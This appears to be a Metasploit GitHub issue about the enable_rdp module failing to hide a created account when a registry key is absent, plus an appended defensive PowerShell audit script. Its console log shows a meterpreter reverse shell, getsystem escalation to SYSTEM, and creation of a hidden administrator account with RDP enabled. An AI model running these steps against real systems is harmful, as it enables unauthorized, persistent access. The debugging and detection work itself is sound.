Open kainpark7894 opened 8 years ago
Video: https://youtu.be/RCURULJO93g
Odd. I do not have that key on my test VM, yet the module still hides the user:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <msf_IP>
lhost => <msf_IP>
msf exploit(handler) > set lport 4545
lport => 4545
msf exploit(handler) > run
[*] Started reverse TCP handler on <msf_IP>:4545
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to <target_IP>
[*] Meterpreter session 1 opened (<msf_IP>:4545 -> <target_IP>:49338) at 2016-08-11 13:23:24 -0700
meterpreter > getuid
Server username: WIN-CMLEMCUFOB2\bwatters
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-CMLEMCUFOB2
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/enable_rdp
msf post(enable_rdp) > show options
Module options (post/windows/manage/enable_rdp):
Name Current Setting Required Description
---- --------------- -------- -----------
ENABLE true no Enable the RDP Service and Firewall Exception.
FORWARD false no Forward remote port 3389 to local Port.
LPORT 3389 no Local port to forward remote connection.
PASSWORD no Password for the user created.
SESSION yes The session to run this module on.
USERNAME no The username of the user to create.
msf post(enable_rdp) > set username fakeuser
username => fakeuser
msf post(enable_rdp) > set password 12345
password => 12345
msf post(enable_rdp) > set session 1
session => 1
msf post(enable_rdp) > run
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: fakeuser with Password: 12345
[*] Adding User: fakeuser to local group 'Remote Desktop Users'
[*] Hiding user from Windows Login screen
[*] Adding User: fakeuser to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /home/bwatters/.msf4/loot/20160811132452_default_<target_IP>_host.windows.cle_227173.txt
[*] Post module execution completed
msf post(enable_rdp) >
@kainpark7894 am I missing a condition, or have I not followed a step correctly to reproduce the error?
regkey -> winlogin -> (special account) register key null -> enable_rdp -> no hide user
difference video 0:05 <> 0:49
OS: Windows 7 64-bit Ultimate K version
Bumping this issue because it's been reported by a few users as recently as 2019 and 2020.
The following patch was suggested by @Koraman in #11221.
registry_createkey(hide_user_key)
Edit: The discrepancies described in the thread above may possibly be due to differences between versions of Windows which don't support RDP (i.e., Home) as described in #8873.
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
I haven't looked into this fully yet, but I'm just cross-referencing https://github.com/rapid7/metasploit-framework/pull/17336 due to the comment:
The discrepancies described in the thread above may possibly be due to differences between versions of Windows which don't support RDP (i.e., Home)
We should ensure the version API has an easy way to check for Home, etc., which would allow us to notify the user that the module won't work against the target
post/windows/manage/enable_rdp.rb
https://github.com/rapid7/metasploit-framework/blob/adb275520b9552d6760eae50d0cd8074976d215b/modules/post/windows/manage/enable_rdp.rb#L142
hide_user_key error
// If the registry path does not work -> login session user info hide error
hide_user_key = 'HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
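An added audit script (not part of this thread or of the enable_rdp module) that checks a host for the artefacts the module run above leaves behind: accounts hidden from the logon screen under the SpecialAccounts\UserList key, RDP switched on, and a local account sitting in both 'Remote Desktop Users' and 'Administrators'. It assumes an elevated PowerShell 5.1 or later session on the host being checked; the fDenyTSConnections value it reads is the standard Terminal Server setting, not something taken from the thread.

```powershell
# Added audit example, not code from the metasploit-framework project.
# Assumes PowerShell 5.1+ (Get-LocalGroupMember) running elevated on the host.
$hideKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
$tsKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

function Get-HiddenLogonAccounts {
    # Names whose UserList value is 0 are hidden from the Windows logon screen.
    # If the key is absent (the situation in this issue) nothing can be hidden this way.
    if (-not (Test-Path $hideKey)) { return @() }
    $item = Get-Item $hideKey
    return @($item.GetValueNames() | Where-Object { $item.GetValue($_) -eq 0 })
}

function Test-RdpEnabled {
    # fDenyTSConnections = 0 means incoming Remote Desktop connections are allowed.
    $v = Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue
    return ($null -ne $v) -and ($v.fDenyTSConnections -eq 0)
}

function Get-RdpAdminOverlap {
    # Local accounts that are members of both groups, which is exactly what the
    # module produces for the account it creates.
    $rdp = @(Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue | ForEach-Object Name)
    $adm = @(Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue | ForEach-Object Name)
    return @($rdp | Where-Object { $adm -contains $_ })
}

# Report each finding; an empty result on all three is the expected clean state.
$hidden  = Get-HiddenLogonAccounts
$overlap = Get-RdpAdminOverlap
if ($hidden.Count -gt 0)  { Write-Warning "Accounts hidden from logon screen: $($hidden -join ', ')" }
if (Test-RdpEnabled)      { Write-Warning "RDP is enabled (fDenyTSConnections = 0)" }
if ($overlap.Count -gt 0) { Write-Warning "RDP users who are also local admins: $($overlap -join ', ')" }
if ($hidden.Count -eq 0 -and -not (Test-RdpEnabled) -and $overlap.Count -eq 0) {
    Write-Output 'No enable_rdp-style artefacts found.'
}
```

Run it from a scheduled or baseline check and compare the RDP/admin overlap and hidden-account lists against the host's known configuration; any account that appears in both lists without a change record warrants investigation.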